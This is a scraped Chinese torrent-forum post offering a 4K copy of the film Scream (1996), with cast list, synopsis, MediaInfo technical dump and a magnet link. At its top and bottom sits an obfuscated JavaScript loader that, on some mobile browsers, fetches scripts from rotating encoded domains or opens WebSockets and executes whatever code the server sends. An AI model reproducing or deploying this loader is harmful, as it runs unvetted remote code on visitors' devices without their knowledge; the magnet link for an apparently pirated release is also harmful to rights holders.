惊声尖叫[简繁字幕].Scream.1996.UHD.BluRay.2160p.DTS-HD.MA5.1.x265.10bit.HDR 13.57GB

版主小s 29天前 173

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 惊声尖叫 / 夺命狂呼(港) / 尖叫

◎片 名 Scream

◎年 代 1996

◎产 地 美国

◎类 别 悬疑 / 恐怖 / 犯罪

◎语 言 英语

◎上映日期 1996-12-20

◎IMDb链接 https://www.imdb.com/title/tt0117571/

◎豆瓣评分 7.1/10 (44176人评价)

◎豆瓣链接 https://movie.douban.com/subject/1301630/

◎片 长 111 分钟

◎导 演 韦斯·克雷文 Wes Craven (id:1025221)

◎编 剧 凯文·威廉姆森 Kevin Williamson (id:1032153)

◎演 员 内芙·坎贝尔 Neve Campbell (id:1027828)

斯基特·乌尔里奇 Skeet Ulrich (id:1004631)

柯特妮·考克斯 Courteney Cox (id:1040995)

大卫·阿奎特 David Arquette (id:1049510)

德鲁·巴里摩尔 Drew Barrymore (id:1054525)

马修·里沃德 Matthew Lillard (id:1004615)

Joseph Whipp Joseph Whipp (id:1166161)

Lisa Beach Lisa Beach (id:1278137)

丽莎·坎宁 Lisa Canning (id:1071723)

Troy Bishop Troy Bishop (id:1055721)

琳达·布莱尔 Linda Blair (id:1007024)

杰米·肯尼迪 Jamie Kennedy (id:1019042)

弗兰西斯·李·麦克凯恩 Frances Lee McCain (id:1022893)

韦斯·克雷文 Wes Craven (id:1025221)

列维·施瑞博尔 Liev Schreiber (id:1027151)

亨利·温克勒 Henry Winkler (id:1041140)

罗丝·麦高恩 Rose McGowan (id:1049504)

W·厄尔·布朗 W. Earl Brown (id:1049772)

哈维·韦恩斯坦 Harvey Weinstein (id:1054304)

Cathy Konrad Cathy Konrad (id:1288878)

卡里·伍兹 Cary Woods (id:1301251)

鲍伯·韦恩斯坦 Bob Weinstein (id:1300654)

玛丽安·马达莱娜 Marianne Maddalena (id:1290689)

Julee Cruise Julee Cruise (id:1077038)

马可·贝尔崔米 Marco Beltrami (id:1027998)

Mark Irwin Mark Irwin (id:1025459)

帕特里克·卢西尔 Patrick Lussier (id:1315802)

Lisa Beach Lisa Beach (id:1278137)

芭芭拉·奥尔维拉 Barbara Olvera (id:1293578)

罗伯特库兹曼 Robert Kurtzman (id:1036962)

Carol Schwartz Carol Schwartz (id:1297008)

霍华德·伯杰 Howard Berger (id:1278442)

格里高利·尼克特洛 Gregory Nicotero (id:1128804)

◎标 签 惊悚 / 恐怖 / 美国 / 悬疑 / 美国电影 / 1996 / 犯罪 / 恐怖电影

◎简 介

锡德尼?普雷斯科特(内芙?坎贝尔饰)的母亲去世一周年,这个本该平静的加州小镇变成了一片血海!两名学生被残忍地杀害,凶手是一位带着面具的恐怖片爱好者。警方将锡德尼的男友比尔?卢米斯(斯基特?乌尔里奇饰)定为嫌疑犯,并予以逮捕。但这时又有命案发生!神出鬼没的面具凶手仿佛死神般带走一个又一个生命,但凶手的真面目却无人知晓。夜幕降临,凶手将锡德尼身边的人一个个杀害,而被害人只能在被害前惊声尖叫。谁能够从凶手的刀下躲过,谁能揭开凶手的面具呢?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 289505771404625520360163662334594964586 (0xD9CCC88E59F2F0F170CFB9233F44DC6A)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 13.6 GiB

  8. Duration : 1 h 51 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 17.5 Mb/s

  11. Encoded date : UTC 2021-11-02 10:01:05

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 51 min

  22. Bit rate : 13.3 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 634 pixels

  25. Display aspect ratio : 2.35:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0 (Type 2)

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.089

  32. Stream size : 10.3 GiB (76%)

  33. Title : HEVC, [email protected]@High, 24/1.001 fps @ 13328 kbps

  34. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1634 / interlace=0 / total-frames=159728 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=1000,756 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language : English

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0050 cd/m2, max: 4000 cd/m2

  45. Maximum Content Light Level : 1000 cd/m2

  46. Maximum Frame-Average Light Level : 756 cd/m2


  47. Audio #1

  48. ID : 2

  49. Format : DTS XLL

  50. Format/Info : Digital Theater Systems

  51. Commercial name : DTS-HD Master Audio

  52. Codec ID : A_DTS

  53. Duration : 1 h 51 min

  54. Bit rate mode : Variable

  55. Bit rate : 3 718 kb/s

  56. Channel(s) : 6 channels

  57. Channel layout : C L R Ls Rs LFE

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 93.750 FPS (512 SPF)

  60. Bit depth : 24 bits

  61. Compression mode : Lossless

  62. Stream size : 2.88 GiB (21%)

  63. Title : English DTS-HD Master Audio 5.1 @ 3718 kbps

  64. Language : English

  65. Default : Yes

  66. Forced : No


  67. Audio #2

  68. ID : 3

  69. Format : AC-3

  70. Format/Info : Audio Coding 3

  71. Commercial name : Dolby Digital

  72. Codec ID : A_AC3

  73. Duration : 1 h 51 min

  74. Bit rate mode : Constant

  75. Bit rate : 224 kb/s

  76. Channel(s) : 2 channels

  77. Channel layout : L R

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 31.250 FPS (1536 SPF)

  80. Compression mode : Lossy

  81. Stream size : 178 MiB (1%)

  82. Title : English Dolby Digital Audio 2.0 @ 224 kbps Commentary

  83. Language : English

  84. Service kind : Complete Main

  85. Default : No

  86. Forced : No


  87. Text #1

  88. ID : 4

  89. Format : PGS

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 43 min

  93. Bit rate : 42.8 kb/s

  94. Count of elements : 2928

  95. Stream size : 31.7 MiB (0%)

  96. Title : Eng/SUP

  97. Language : English

  98. Default : No

  99. Forced : No


  100. Text #2

  101. ID : 5

  102. Format : PGS

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 43 min

  106. Bit rate : 49.5 kb/s

  107. Count of elements : 3496

  108. Stream size : 36.8 MiB (0%)

  109. Title : Eng/SUP SDH

  110. Language : English

  111. Default : No

  112. Forced : No


  113. Text #3

  114. ID : 6

  115. Format : PGS

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 50 min

  119. Bit rate : 72.8 kb/s

  120. Count of elements : 3886

  121. Stream size : 57.5 MiB (0%)

  122. Title : Eng/SUP Commentary

  123. Language : English

  124. Default : No

  125. Forced : No


  126. Text #4

  127. ID : 7

  128. Format : PGS

  129. Codec ID : S_HDMV/PGS

  130. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration : 1 h 44 min

  132. Bit rate : 33.8 kb/s

  133. Count of elements : 3004

  134. Stream size : 25.3 MiB (0%)

  135. Title : Chs/SUP 简体

  136. Language : Chinese

  137. Default : Yes

  138. Forced : No


  139. Text #5

  140. ID : 8

  141. Format : PGS

  142. Codec ID : S_HDMV/PGS

  143. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  144. Duration : 1 h 44 min

  145. Bit rate : 35.7 kb/s

  146. Count of elements : 3004

  147. Stream size : 26.8 MiB (0%)

  148. Title : Cht/SUP 繁体

  149. Language : Chinese

  150. Default : No

  151. Forced : No


  152. Menu

  153. 00:00:00.000 : en:第 01 章

  154. 00:00:18.809 : en:第 02 章

  155. 00:12:59.528 : en:第 03 章

  156. 00:18:43.079 : en:第 04 章

  157. 00:33:08.027 : en:第 05 章

  158. 00:35:57.780 : en:第 06 章

  159. 00:37:13.688 : en:第 07 章

  160. 00:40:05.443 : en:第 08 章

  161. 00:51:15.489 : en:第 09 章

  162. 01:04:27.237 : en:第 10 章

  163. 01:13:07.131 : en:第 11 章

  164. 01:19:49.283 : en:第 12 章

  165. 01:27:02.050 : en:第 13 章

  166. 01:34:41.300 : en:第 14 章

  167. 01:36:28.198 : en:第 15 章

  168. 01:38:04.086 : en:第 16 章




复制代码


TAGS 恐怖 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:BD9E4F0C4CE1EFC15103A601FAD2E008BECF2C41

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};